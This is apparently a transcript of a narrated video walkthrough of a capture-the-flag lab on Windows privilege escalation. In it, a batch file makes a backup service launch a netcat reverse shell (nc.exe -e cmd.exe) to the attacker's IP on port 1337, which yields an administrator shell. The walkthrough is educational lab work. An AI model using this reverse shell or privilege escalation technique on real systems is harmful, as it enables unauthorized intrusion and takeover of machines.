Hello, and welcome to another challenge. As I said, I am behind, so I'm working my way through some of these challenges that I need to catch up on, such as this challenge, day 13, in the networking section. They lost the plan. Oh, what plan did we lose? Background: McSkitty has realized that she worked on a rough draft of a disaster, recovery plan, but locked down the permission on the file to ensure that it was safe. However, the Grinch accessed the local system and reduced the permission of her account. Can you elevate her privileges and get the file back? So let me start the machine. So in this section, we're going to do, we're going to learn or learn about privilege escalation. And that's where in this case, we're going to do vertical privilege escalation, where we start off as a standard user and then we're going to elevate into an administrator. And we're going to do this in Windows. And we're going to exploit a privilege escalation vulnerability. So, privileges. McSkitty made the right decision. Any malicious hacker's life is easier once they connect to a system with privileged accounts, right? Because when you're an administrator, you have the keys to the kingdom. You can do anything on the system. A privileged account, such as an administrator on Windows or root on Linux, will allow them to access any file on the system, which is pretty much what I said. An account with a lower privilege can make things more difficult. So the Grinch has a pretty good understanding of cybersecurity. Restricting McSkitty account privileges make the incident response process more difficult. And so, just to give a bit of background, on a typical Windows server, you may find several different account types. Domain administrators, this is typically the highest account level you will find in an enterprise, along with enterprise administrators. An account with this level of privilege can manage all accounts of the organization, their access level, and almost anything you can think of. And a domain is a central registry used to manage all users and computers within the organization. And then a service is an account used by software to perform their tasks, such as backups or antivirus scans. Domain users accounts typically used by employees. These should have just enough privileges to do their daily jobs only. So you shouldn't be giving super privileges. So, for example, a system administrator, so you may restrict their access to install and uninstall software. So you shouldn't be giving them access to add users or, add groups or things of that nature, things that are outside of their job function, right? You just want to give them just enough. And local accounts are only valid on the local system, and can't be used over the domain. Accounts can be easily managed with groups, and for example, the McSkitty account can be created as a regular user and be added later to the domain administrators group, giving it domain administrators privileges. So remember, domain administrator is like the highest level, right? So then, this is pretty long, so I'm going to skip some of this. So ideally, McSkitty should explore all the vectors above. Privilege escalation does not have a silver bullet. It really depends on the system. And the vector that will work depends on not only the configuration of the target system, but in some cases, the user behavior. Finding a passwords.txt file on the desktop where the user notes his account passwords. In some cases, you will need to combine two or more vectors to achieve the desired results. And so we have some initial information gathering here to get the users of a target system, net users. And so this is for Windows, and that will list users on the target system. The OS version um, will output the operating system and installed services. Now, exploitation. I'm reading all of this because I'm waiting for our machine to come up. The Hyperius backup service suffers from a privilege escalation vulnerability. McSkitty could use it to elevate her privileges on the system. When Hyperius backup is installed as a service, it can be configured to run backup tasks with administrator privileges, even if the current user has a lower privilege level. This is important. So we're going to go from a standard user. We're going to exploit this backup service to go from a regular user to an administrator. So let's explore the exploitation steps. Create a new backup task. The task itself is not important. It says you can set the backup path as C users McSkitty documents and set the destination. For the destination tab, you can set the location where the backup will be written. Again, this is not important. You can set it to C users McSkitty desktop. Other processes. The other processes tab is important. As you can see, this gives us the option to set a program to run before or after every backup process. As the backup process is ran with administrator privileges, any program or external file configured here will be ran with administrator privileges, and this is what we want because we want to go from a standard user to an admin. To exploit this, we will create a simple bat file and set it to run before the backup. So the bat file will launch a shell using the NC or netcat executable utility, which is located C users McSkitty download. So let me go there. C users McSkitty downloads, and yep, it's right there. Launch the Notepad text editor and enter the following lines. So I'm going to say, okay, Notepad. And I am going to say add echo off. I'm just going to copy what it says here. Users McSkitty downloads nc.exe for netcat. And then our attack IP. I am in Cali, so my attack IP is going to be 10.10.252.87. It's going to be this IP here. And then the port 1337. And then this -E is going to say is for execute, and we want to execute command.exe. And so you can save the file as evil.bat on the desktop of the target system at 10.10.252.87, which is the attack machine. So I'm going to save this on the desktop. I'm going to say evil.bat. And I'm going to create a listener in C NVLP 1337. And it's listening. Now, it says, okay, now it's selected by running. So now what I'm going to do is I'm going to minimize this, and I'm going to double click. Okay. Then I pick the IF config 10.13.2. I think I picked the wrong IP. Let me go back here. Yeah, I think I picked the wrong IP. So the IP should be this tunnel 0, 10, 13 to 231. So let me save. Okay. Yep. Now that works because you'll notice now this is hanging. Because now we have a connection here. And now we're in Windows. As you can see, we're in Windows. We have made a connection and we are running. If I say, who am I? Okay, we're McSkitty. So hold on. So, um, we have opened a shell. So we have created a shell. Now, if I say net users, what is the username? Pepper. Oh, I got a 7-day streak. What is the OS version? Okay. So I'm going to run this. I don't know. Copy. Paste. Did I miss something? So info find stream B C OS name OS version. Print system info, and it is what is the OS version? Here's the OS version here. What backup service did you find running on the system? Let's try this. WMIC service list. Okay, I see this is running. So, okay, so hold on. I'm gonna run the who am I? 'Cause I wanna. Okay, so something isn't right with the privilege escalation. So, okay. Because I made a shell, but it seemed like the privilege escalation was not correct. Okay, so let me. I'm actually going to close this and I'm going to open a new listener. I didn't do this right because I didn't escalate my privileges. I went in as McSkitty. Um, so let's see. So it's saying. Okay, hold on. Create a new backup. Okay. processes. Okay. Next. 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 Okay. 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 Okay, let's see. Who am I? Okay. Still didn't elevate. Oh. Okay, so I want to exit. And I'm going to. Okay. That's what it. Now, I had to run it as a service. Run it as the service as the Grinch because that was the admin. And now running it because before I was McSkitty and that it wasn't escalating. So I was a standard user. So that's the correct user. Um, Now, if I go to what backup service did you find running on? So if I go here and I paste. Okay, I'm looking for things that are running. Things that are stopped, we're not looking for. So, determine and verifies the identity of an application. Disabling the service will prevent app blocker from being enforced. No, I don't think that's it. Okay, process install removal and enumeration request for software deployed through group policy. If this service is disabled, users will be unable to install, remove, or enumerate software deployed through group policy. Um, so that looks kind of interesting. So what are we looking for? We're looking for the backup. Okay, so I'm gonna do this. Okay, I'm gonna do everything that's running. Okay, this is mm-mm. Okay, still looking for a backup service. Plug and play. I'm gonna use a hint. IP Imperious service. I saw that, but I would have never. I would have never thought of that as the backup service. Okay, and here's the path for it. I guess since we're using that the Imperious logic, just going down using that. Okay, so now we need to enumerate. Um, so I'm guessing the flag is not there. It's in documents. So txt. How do you open a file more? Okay. So this is the flag. So most times flags in Windows is on the desktop, but again, it's in the documents. So they were doing this to trick us. And then the schedule. So where is the Grinch going to be at 5:30? Jazzercise. Oh, that's really rich. You gotta get your exercise in. Gotta get that heart rate up. Okay. So we have solved the challenge. As you can see, privilege escalation. It's very powerful, right? So in the beginning, um, I knew I was doing it wrong because when I did the Who Am I was McSkitty. So I was still a normal user, and I realized I wasn't doing the exploitation right because I needed to actually open the Imperius software. Oh, Imperius backup. So that actually made sense for what backup servers did you find. So backup. Okay, make sure you pay attention. So I had to configure this um, software to actually um, invoke the escalation of privilege. And then I also had the wrong IP address because I had originally used the try hack me this address and it wasn't finding it. And then I had to use my tunnel, the 10.13.2.231. And once I did that, it worked, but then it was hanging as a normal user. And then I had to again use the Imperius backup. And when I tried to run it as a backup, that didn't work because it was asking for the password and I didn't have it because again, I'm a standard user. So then when I ran it as a service, as the Grinch hack, the Grinch, running it as a service, the password must be already saved. And then that allowed us to uh, run our bat file correctly and then escalate our privileges as we needed to. And we were able to see that when we did the Who Am I and we were the Grinch hack, the Grinch, which matched this here. So that let us know we were admin. So again, I learned quite a bit. Windows privilege escalation really isn't my jam. I need to learn it. But yeah, so it was pretty cool. So I can't wait to see you in the next video. Have a good day. Bye.